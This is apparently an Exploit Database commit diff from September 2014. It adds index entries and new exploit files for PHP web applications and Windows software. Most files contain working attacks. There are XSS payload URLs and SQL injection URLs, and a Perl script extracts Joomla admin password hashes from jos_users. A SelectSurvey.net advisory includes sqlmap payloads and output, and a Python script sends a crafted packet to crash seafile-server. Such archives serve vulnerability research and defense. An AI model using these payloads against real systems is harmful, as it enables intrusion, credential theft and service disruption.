Updated 09_22_2014

files.csv

@@ -31241,6 +31241,7 @@ id,file,description,date,author,platform,type,port
 34695,platforms/windows/remote/34695.c,"GreenBrowser 'RSRC32.DLL' DLL Loading Arbitrary Code Execution Vulnerability",2010-09-22,anT!-Tr0J4n,windows,remote,0
 34696,platforms/windows/remote/34696.c,"Easy Office Recovery 'dwmapi.dll' DLL Loading Arbitrary Code Execution Vulnerability",2010-09-22,anT!-Tr0J4n,windows,remote,0
 34697,platforms/windows/remote/34697.c,"Sothink SWF Decompiler 'dwmapi.dll' DLL Loading Arbitrary Code Execution Vulnerability",2010-09-22,anT!-Tr0J4n,windows,remote,0
+34698,platforms/windows/dos/34698.txt,"Microsoft Excel 2002 - Memory Corruption Vulnerability",2010-09-23,Abysssec,windows,dos,0
 34699,platforms/php/webapps/34699.txt,"OpenText LiveLink 9.7.1 Multiple Cross Site Scripting Vulnerabilities",2010-09-23,"Alejandro Ramos",php,webapps,0
 34700,platforms/php/webapps/34700.txt,"WebShop Hun 1.062s 'index.php' Local File Include and Cross Site Scripting Vulnerabilities",2009-07-24,u.f.,php,webapps,0
 34701,platforms/php/webapps/34701.txt,"SkaLinks 1.5 'cat' Parameter Multiple Cross Site Scripting Vulnerabilities",2009-07-24,Moudi,php,webapps,0
@@ -31249,3 +31250,15 @@ id,file,description,date,author,platform,type,port
 34704,platforms/php/webapps/34704.txt,"MyDLstore Pixel Ad Script 'payment.php' Cross Site Scripting Vulnerability",2009-07-21,Moudi,php,webapps,0
 34705,platforms/php/webapps/34705.txt,"APBook 1.3 Admin Login Multiple SQL Injection Vulnerabilities",2009-07-21,n3w7u,php,webapps,0
 34706,platforms/php/webapps/34706.txt,"MyDLstore Meta Search Engine Script 1.0 'url' Parameter Remote File Include Vulnerability",2009-07-21,Moudi,php,webapps,0
+34707,platforms/php/webapps/34707.txt,"RadAFFILIATE Links 'index.php' Cross Site Scripting Vulnerability",2009-08-17,Moudi,php,webapps,0
+34708,platforms/php/webapps/34708.pl,"Joomla! 'com_tax' Component 'eid' Parameter SQL Injection Vulnerability",2010-09-23,FL0RiX,php,webapps,0
+34709,platforms/php/webapps/34709.txt,"Astrology 'celebrities.php' Cross Site Scripting Vulnerability",2009-07-20,Moudi,php,webapps,0
+34710,platforms/php/webapps/34710.txt,"Paypal Shopping Cart Script index.php Multiple Parameter XSS",2009-08-21,"599eme Man",php,webapps,0
+34711,platforms/php/webapps/34711.txt,"Paypal Shopping Cart Script index.php cid Parameter SQL Injection",2009-08-21,"599eme Man",php,webapps,0
+34712,platforms/php/webapps/34712.txt,"FreeWebScriptz HUBScript 'single_winner1.php' Cross Site Scripting Vulnerability",2009-07-20,Moudi,php,webapps,0
+34713,platforms/php/webapps/34713.txt,"Freelancers placebid.php id Parameter XSS",2009-08-17,Moudi,php,webapps,0
+34714,platforms/php/webapps/34714.txt,"Freelancers post_resume.php jobid Parameter XSS",2009-08-17,Moudi,php,webapps,0
+34715,platforms/php/webapps/34715.txt,"AdQuick 'account.php' Cross Site Scripting Vulnerability",2009-07-20,Moudi,php,webapps,0
+34721,platforms/php/webapps/34721.txt,"Livefyre LiveComments Plugin - Stored XSS",2014-09-20,"Brij Kishore Mishra",php,webapps,0
+34722,platforms/php/webapps/34722.txt,"ClassApps SelectSurvey.net - Multiple SQL Injection Vulnerabilities",2014-09-20,BillV-Lists,php,webapps,0
+34729,platforms/windows/dos/34729.py,"Seafile-server <= 3.1.5 - Remote DoS",2014-09-20,"nop nop",windows,dos,0

platforms/php/webapps/34707.txt

@@ -0,0 +1,8 @@
+source: http://www.securityfocus.com/bid/43459/info
+
+RadAFFILIATE Links is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. 
+
+http://www.example.com/links_style1/?id_category=1&feat=1%00"&#039;><ScRiPt%20%0a%0d>alert(310243950025)%3B</ScRiPt>
+http://www.example.com/links_style1/index.php?id_category=0&feat=1>"><ScRiPt %0A%0D>alert(325194346916)%3B</ScRiPt>

platforms/php/webapps/34708.pl

@@ -0,0 +1,42 @@
+source: http://www.securityfocus.com/bid/43461/info
+
+The 'com_tax' component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+#!/usr/bin/perl -w
+
+########################################
+#[~] Author : Fl0riX
+#[!] Greetz: Sakkure And All My Friends
+#[!] Script_Name: Joomla Com_tax
+#[!] Exaple: >>> perl exploit.pl
+             >>> http://site.com
+########################################
+
+print "\t\t                                                             \n\n";
+print "\t\t| Fl0rix | Bug Researchers";
+print "\t\t                                                             \n\n";
+print "\t\t| Greetz: Sakkure And All My Friends";
+print "\t\t                                                             \n\n";
+print "\t\t|Joomla com_tax Remote SQL Inj. Exploit|\n\n";
+print "\t\t                                                             \n\n";
+use LWP::UserAgent;
+print "\nSite ismi Target page:[http://wwww.site.com/path/]: ";
+chomp(my $target=<STDIN>);
+$florix="concat(username,0x3a,password)";
+$sakkure="jos_users";
+$un="+UNION+SELECT+";
+$com="com_tax&task=fullevent";
+$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
+$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
+$host = $target . "/index.php?option=".$com."&eid=null".$un."1,".$florix.",3,4,5,6+from+".$sakkure."+--+";
+$res = $b->request(HTTP::Request->new(GET=>$host));
+$answer = $res->content; if ($answer =~/([0-9a-fA-F]{32})/){
+print "\n[+] Admin Hash : $1\n\n";
+print "# Baba Buyuksun bea Bu is bu kadar xD #\n\n";
+}
+else{print "\n[-] Malesef Olmadi Aga bir dahaki sefere\n";
+}
+
+ 		 	   		  

platforms/php/webapps/34709.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/43470/info
+
+Astrology is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. 
+
+http://www.example.com/demo/astrology/celebrities.php?month=01&day=1<ScRiPt %0A%0D>alert(309147116220)%3B</ScRiPt>
+http://www.example.com/celebrities.php?month=01&day=1<ScRiPt %0A%0D>alert(309147116220)%3B</ScRiPt>
+

platforms/php/webapps/34710.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/43471/info
+
+Paypal Shopping Cart Script is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/paypalshopping/index.php?cid="><script>alert(document.cookie);</script>
+
+http://www.example.com/paypalshopping/index.php?txtkeywords=%3CSCRIPT%3Ealert(String.fromCharCode(88%2C83%2C83))%3C%2FSCRIPT%3E&cmdSearch=Search
+
+

platforms/php/webapps/34711.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/43471/info
+ 
+Paypal Shopping Cart Script is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+ 
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+ 
+http://www.example.com/paypalshopping/index.php?cid=7%20union%20all%20select%201,2,3,version(),5,6,7--
+
+http://www.example.com/paypalshopping/index.php?cid=1%20AND%201=null+union+select+1,2,3,version(),5,6,7--

platforms/php/webapps/34712.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/43474/info
+
+HUBScript is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+FreeWebScriptz HUBScript V1 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/hubscript/demo/single_winner1.php?bid_id= XSS TO ADD: 1<script>alert(412798982398)</script>

platforms/php/webapps/34713.txt

@@ -0,0 +1,9 @@
+source:  http://www.securityfocus.com/bid/43475/info
+
+FreeWebScriptz Freelancer Script is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+FreeWebScriptz Freelancer Script 1.0 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/script/freelancer/placebid.php?id= ADD THIS XSS: 1<script>alert(364298092082)</script>

platforms/php/webapps/34714.txt

@@ -0,0 +1,9 @@
+source:  http://www.securityfocus.com/bid/43475/info
+ 
+FreeWebScriptz Freelancer Script is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+ 
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+ 
+FreeWebScriptz Freelancer Script 1.0 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/script/freelancer/post_resume.php?jobid= ADD THIS XSS: 1<script>alert(372848775668)</script>

platforms/php/webapps/34715.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/43477/info
+
+AdQuick is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+AdQuick 2.2.1 is vulnerable; others versions may be affected.
+
+http://www.example.com/account.php?smw&red_url=1>"><ScRiPt %0A%0D>alert(322094267678)%3B</ScRiPt>

platforms/php/webapps/34721.txt

@@ -0,0 +1,21 @@
+Title : Stored XSS in Livefyre LiveComments Plugin
+CVE : 2014-6420
+Vendor Homepage : http://livefyre.com
+Software Link : http://web.livefyre.com/streamhub/#liveComments
+Version : v3.0
+Author : Brij Kishore Mishra
+Date : 03-Sept-2014
+Tested On : Chrome 37, Ubuntu 14.04
+
+
+Description :
+
+This plugin requires user to be signed in via livefyre account to post
+comments. Users have the option to upload pictures in comments. This
+feature can be easily abused.
+
+Using an intercepting proxy (e.g. Burp Suite), the name variable can be
+edited to send an XSS payload while uploading a picture (payload used :
+"><img src=x onerror=prompt(1337)>). When the comment is posted, the image
+will be successfully uploaded, which leads to XSS due to an unsanitized
+field.

platforms/php/webapps/34722.txt

@@ -0,0 +1,71 @@
+##########
+# Exploit Title: Multiple SQL Injection Vulnerabilities in SelectSurvey.net
+# Google Dork: intitle:SelectSurvey
+# Date: Sep 03 2014
+# Vendor Homepage: https://www.classapps.com/
+# Software Link: https://www.classapps.com/SelectSurveyNETOverview.asp
+# Version: 4.124.004
+# Tested on: Windows 2008 R2/SQL Server 2008
+# CVE: 2014-6030
+##########
+
+Description
+==========
+SelectSurvey.net is a web-based survey application written in ASP.net
+and C#. It is vulnerable to multiple SQL injection attacks, both
+authenticated and unauthenticated. The authenticated vulnerability
+resides within the file upload script, as the parameters are not
+sanitized prior to being placed into the SQL query. ClassApps had
+previously listed 'SQL injection protection' as a feature and did have
+several functions in place to attempt to prevent such attacks but due to
+using a "blacklisting" approach, it is possible to circumvent these
+functions. These functions are used elsewhere throughout the application
+to protect GET request variables but are not sufficient. Only this
+specific version of the application has been tested but it is highly
+likely these vulnerabilities exist within prior versions. It has not
+been confirmed that these vulnerabilities are fixed. The vendor stated
+that they would be fixed in this new release however, they do not allow
+download of the code unless you are a customer so fixes have not been
+verified.
+
+Vulnerabilities
+==========
+Unauthenticated:
+http[s]://<host>/survey/ReviewReadOnlySurvey.aspx?ResponseID=<num>&SurveyID=[SQLi]
+
+Authenticated:
+http[s]://<host>/survey/UploadImagePopupToDb.aspx?ResponseID=<num>&SurveyID=[SQLi]
+
+sqlmap identified the following injection points:
+---
+Place: GET
+Parameter: SurveyID
+    Type: boolean-based blind
+    Title: AND boolean-based blind - WHERE or HAVING clause
+    Payload: ResponseID=1&SurveyID=1' AND 4002=4002 AND 'dLur'='dLur
+
+    Type: stacked queries
+    Title: Microsoft SQL Server/Sybase stacked queries
+    Payload: ResponseID=1&SurveyID=1'; WAITFOR DELAY '0:0:5'--
+
+    Type: AND/OR time-based blind
+    Title: Microsoft SQL Server/Sybase time-based blind
+    Payload: ResponseID=1&SurveyID=1' WAITFOR DELAY '0:0:5'--
+---
+[14:01:39] [INFO] testing Microsoft SQL Server
+[14:01:39] [INFO] confirming Microsoft SQL Server
+[14:01:39] [INFO] the back-end DBMS is Microsoft SQL Server
+[14:01:39] [INFO] fetching banner
+web server operating system: Windows 2008 R2 or 7
+web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
+back-end DBMS operating system: Windows 7 Service Pack 1
+back-end DBMS: Microsoft SQL Server 2008
+banner:
+---
+Microsoft SQL Server 2008 R2 (SP2) - 10.50.4000.0 (X64)
+    Jun 28 2012 08:36:30
+    Copyright (c) Microsoft Corporation
+    Enterprise Edition (64-bit) on Windows NT 6.1 <X64> (Build 7601:
+Service Pack 1)
+---
+

platforms/windows/dos/34698.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/43419/info
+
+Microsoft Excel is prone to a memory-corruption vulnerability.
+
+An attacker could exploit this issue to execute arbitrary code in the context of the application. Failed exploit attempts may result in denial-of-service conditions. 
+
+http://www.exploit-db.com/sploits/34698.rar

platforms/windows/dos/34729.py

@@ -0,0 +1,27 @@
+# Exploit Title: ccnet-server remote DoS (assert) seafile-server <= 3.1.5 
+# Date: Sep 4, 2014
+# Exploit Author: retset
+# Vendor Homepage: seafile.com
+# Software Link: https://bitbucket.org/haiwen/seafile/downloads/seafile-server_3.1.4_win32.tar.gz
+# Version: seafile-server 3.1.4
+# Tested on: Windows 7/seafile-server 3.1.5
+
+import socket
+import sys
+
+
+ip = sys.argv[1]
+addr = (ip, 10001)
+s = socket.create_connection(addr)
+
+dos = '\x00\x04\x00\x00\x00\x00\x03\xe8'
+dos += '\x00' * 1001 
+
+s.send(dos)
+print repr(s.recv(1024))
+
+
+s.close()
+
+
+#@retset